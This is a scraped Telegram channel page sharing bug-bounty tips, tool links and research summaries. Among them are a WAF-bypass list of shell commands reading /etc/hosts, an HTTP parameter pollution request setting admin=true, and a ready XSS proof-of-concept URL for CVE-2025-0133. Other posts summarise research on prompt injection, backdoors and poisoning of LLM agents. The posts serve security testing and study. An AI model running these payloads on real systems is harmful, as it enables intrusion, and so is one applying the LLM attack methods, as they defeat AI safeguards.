Bug bounty Tips

Kanalga Telegram’da o‘tish

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Ko'proq ko'rsatish

Hindiston56 718 Texnologiyalar & Aralashmalar17 214

5 892

Obunachilar

+2224 soatlar

+817 kunlar

+35930 kunlar

495

Post ko'rishlar

~ 28824 soatlar

~ 41548 soatlar

8.41%

Muloqot nisbati

~ 3

Kuniga postlar

Ads index

beta

Postlar arxiv

5 894

#Research "Llama-3.1-FoundationAI-SecurityLLM-8B-Instruct (FS8BI) Technical Report", 2025. ]-> https://huggingface.co/fdtn-ai/Foundation-Sec-8B-Instruct // FS8BI - open-weight, 8-billion parameter instruction-tuned LLM specialized for cybersecurity applications. It leverages prior training to understand security concepts, terminology, and practices across multiple security domains. FS8BI enables organizations to build AI-driven security tools that can be deployed locally, reducing dependency on cloud-based AI services

5 894

Windows lateral movement quick reference #ThreatHunting #DFIR

5 894

⚡Bypass Series for bug hunters😎 Part-2 Crazy WAF Bypass: cat /etc/hosts - triggers WAF xxd -p /etc/hosts | xxd -p -r xargs -d '\n' -I{} echo {} < /etc/hosts perl -pe '' /etc/hosts sed '' /etc/hosts awk '{print}' /etc/hosts dd if=/etc/hosts 2>/dev/null #Bugbountytips #infosec

5 894

People are happy just because OpenAI released there New and Most intelligent Chat Model GPT-5 But as a cybersecurity experts do u think this is a future or a threat? I have posted a thread on this please do check this out. https://x.com/Cipher0ps_tech/status/1953701559545868545

5 894

Guys check this out, My obsidian notes is now online let me know how it is and happy to listen to your feedback https://obsius.site/1o2o0n6w0j0q4u48454m

5 894

#Research #MLSecOps "Security study based on the ChatGPT plugin system: Identifying Security Vulnerabilities", 2024. // The aim of this paper is to explore the security ofplugins in the CHATGPT plugin store, reveal the main security vulnerabilities thatexist, and suggest improvements

5 894

⚡️SSRFUtility - SSRF Exploitation Tool 🔗 https://ssrf.cvssadvisor.com/

5 894

⭐️PACU - The AWS exploitation framework, designed for testing the security of Amazon Web Services environments. ✅https://github.com/RhinoSecurityLabs/pacu

5 894

#Analytics #MLSecOps #Threat_Research "AI Threat Landscape Report", 2025. See also: ]-> 2025 GenAI Code Security Report (.pdf) ]-> LLM and Gen AI Data Security Best Practices

5 894

Hey everyone, I just open-sourced a project I've been working on called PITT. It's a CLI tool to help developers and security folks test their LLM applications against the OWASP LLM Top 10. It uses a configurable "Judge LLM" to make the vulnerability detection much more accurate than simple keyword matching. Would love for you to check it out and hear what you think! GitHub Link: https://github.com/Addy-shetty/Pitt.git

5 894

#tools #MLSecOps #Offensive_security Security Solutions for AI Systems 1⃣ Confidential Computing 1.1 Sentient Enclaves Framework 1.2 SyMPC - SMPC companion library for Syft 1.3 Confidential Computing API 2⃣ Encryption and Data Protection 2.1 IronCoreLabs Transform encryption lib for Scala 2.2 Diffprivlib - IBM Differential Privacy Library 2.3 TenSEAL - Library for doing homomorphic encryption operations on tensors 2.4 PyDP - Python Differential Privacy Library 3⃣ Governance 3.1 VerifyWise - Open source AI governance platform 3.2 Cartai - OSS AI supervisor Agent 4⃣ Model Testing 4.1 Plexiglass - tool to detect/protect LLM vulns 4.2 Giskard-AI - Evaluation/testing for LLM systems 4.3 ModelScan - ML Model Security Scanner 4.4 LlamaFirewall, PurpleLlama - Tools to LLM security 4.5 Garak - LLM vulnerability scanner 4.6 Package for LLM jailbreak evaluation 5⃣ Prompt Firewall and Redaction 5.1 Guardrails AI - Adding guardrails to LLMs 5.2 Private AI - Detect, anonymize, and replace PII 5.3 Lakera Guard - ChatGPT Data Leak Protection 5.4 Rebuff - LLM Prompt Injection Detector 5.5 Trylon Gateway - Open Source Firewall for LLMs 5.6 LLM Guard, Vigil - Security scanner for LLM prompts 5.7 MCP-Scan - Security scanner tool for MCP servers 5.8 Vibranium Dome - LLM WAF for Agents 6⃣ AI Quality Controls and Testing 6.1 GenAI Prompt Fuzzer 6.2 FuzzyAI, LLMFuzzer Frameworks 6.3 Test Generation for Prompts 6.4 Promptfoo: LLM Evals & Red Teaming 7⃣ Training Data Protection 7.1 Trusted-AI - Adversarial Robustness Toolbox 7.2 datasig - Dataset fingerprinting for AIBOM 8⃣ AI for Offensive Cyber 8.1 Vulnhuntr - AI-Discovered 0-day Tool 8.2 Confident AI - LLM Red Teaming Framework 8.3 Agentic LLM Vulnerability Scanner / AI RedTeam Kit 8.4 llm-attacks - Attacks on Aligned LLMs 8.5 HackGPT - Tool using ChatGPT for hacking 8.6 AI/ML Exploits, CAI CTF Framework

5 894

Bug Bounty Tip: HTTP Parameter Pollution (HPP) Some apps mishandle duplicate parameters. You can bypass logic or elevate privileges by injecting multiple values: GET /transfer?amount=100&admin=true&amount=1 ⚠️ Always test: •param=value1&param=value2 •Encoded (%26,)

5 894

#Research #MLSecOps "From Prompt Injections to Protocol Exploits: Threats in LLM-Powered AI Agents Workflows", 2025. // In this Research, we introduce the first unified, end-to-end threat model for LLM-agent ecosystems, spanning host-to-tool and agent-to-agent communications, formalize adversary capabilities and attacker objectives, and catalog over thirty attack techniques. We organized the threat model into four domains: Input Manipulation (prompt injections, long-context hijacks, multimodal adversarial inputs), Model Compromise (prompt- and parameter-level backdoors, composite and encrypted multi-backdoors, poisoning strategies), System and Privacy Attacks (speculative side-channels, membership inference, retrieval poisoning, social-engineering simulations), and Protocol Vulnerabilities (exploits in Model Context Protocol, Agent Communication Protocol, Agent Network Protocol, Agent-to-Agent protocol)

5 894

#exploit 1⃣ CVE-2025-4660: Windows Forescout SecureConnector RCE 2⃣ CVE-2025-48384: Breaking git with a carriage return and cloning RCE 3⃣ CVE-2025-32023: RCE in Redis >= 2.8 4⃣ CVE-2023-4272: Cache Coherence Vulnerability in the Mali GPU Driver 5⃣ The Journey of Bypassing Ubuntu’s Unprivileged Namespace Restriction 6⃣ CVE-2025-6759: LPE in Citrix Virtual Apps and Desktops ]-> Tool to test/mitigation 7⃣ CVE-2024-7401: Improper Authentication in Netskope Client 8⃣ RCE Vulnerability in ETQ Reliance // Disclaimer

5 894

disclose.io

5 894

https://www.notion.so/AD-aboud-1dcabf92dc0f805fb5e6fbb1917ff1f7?source=copy_link http://GitBook_s.t.me

5 894

The recently disclosed XSS vulnerability in GlobalProtect (CVE-2025-0133) has affected hundreds of thousands of organizations worldwide — including thousands of bug bounty programs. Try your luck by running this PoC

/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=<svg xmlns%3D"http%3A%2F%http://2Fwww.w3.org%2F2000%2Fsvg"><script>prompt("XSS")<%2Fscript><%2Fsvg>&domain=(empty_domain)&computer=computer

http://GitBook_s.t.me

5 894